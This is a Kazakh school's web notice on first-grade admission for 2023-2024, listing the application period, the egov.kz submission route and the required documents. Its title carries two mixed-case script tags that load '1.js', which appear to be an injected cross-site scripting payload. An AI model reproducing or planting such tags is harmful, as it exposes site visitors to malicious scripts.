Бірінші сыныпқа қабылдау<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.04.2023

Құрметті ата-аналар!

 

          «Ақмола облысы білім басқармасының Ақкөл ауданы бойынша білім бөлімі Ақкөл қаласының Жайық Бектұров атындағы № 3 жалпы орта білім беретін мектебі» КММ-сі бірінші сыныпқа өтініштерді қабылдай бастайды.

 

2023-2024 оқу жылына орта білім беру ұйымына оқуға қабылдаудың үлгілік қағидаларына сәйкес Жайық Бектұров атындағы № 3 жалпы орта білім беретін мектебіне бірінші сыныпқа өтініштерді қабылдау ағымдағы жылдың 1 сәуірден бастап 1 тамызға дейін қолжетімді болады. Мектепке алты жасқа толған және осы жылдың соңына дейін 6 жасқа  толатын балалар қабылданады.

Құжаттар Еgov.kz «электрондық үкімет» веб-порталы арқылы электрондық форматта қабылданады.

 

Қажетті құжаттар:

  1. Өтініш.
  2. Жеке басын растайтын құжаттың тұпнұсқасы (жеке басын сәйкестендіру үшін

талап етіледі):

  1. Денсаулық жағдайы туралы анықтама (№ 063/у нысан және № 026/у-3 нысан):
  2. Баланың 2 данада 3х4 см. өлшеміндегі фотосуреті.
  3.  Ерекше білім берілуіне қажеттілігі бар балаларды білім беру ұйымдарына оқуға

қабылдау үшін заңды өкілдерінің келісімі болған жағдайда педагогикалық-медициналық-психологиялық комиссияның қорытындысы қосымша беріледі.

 

Просмотров: 294


Пікір қосу



Деректерді қолтаңбаға қосу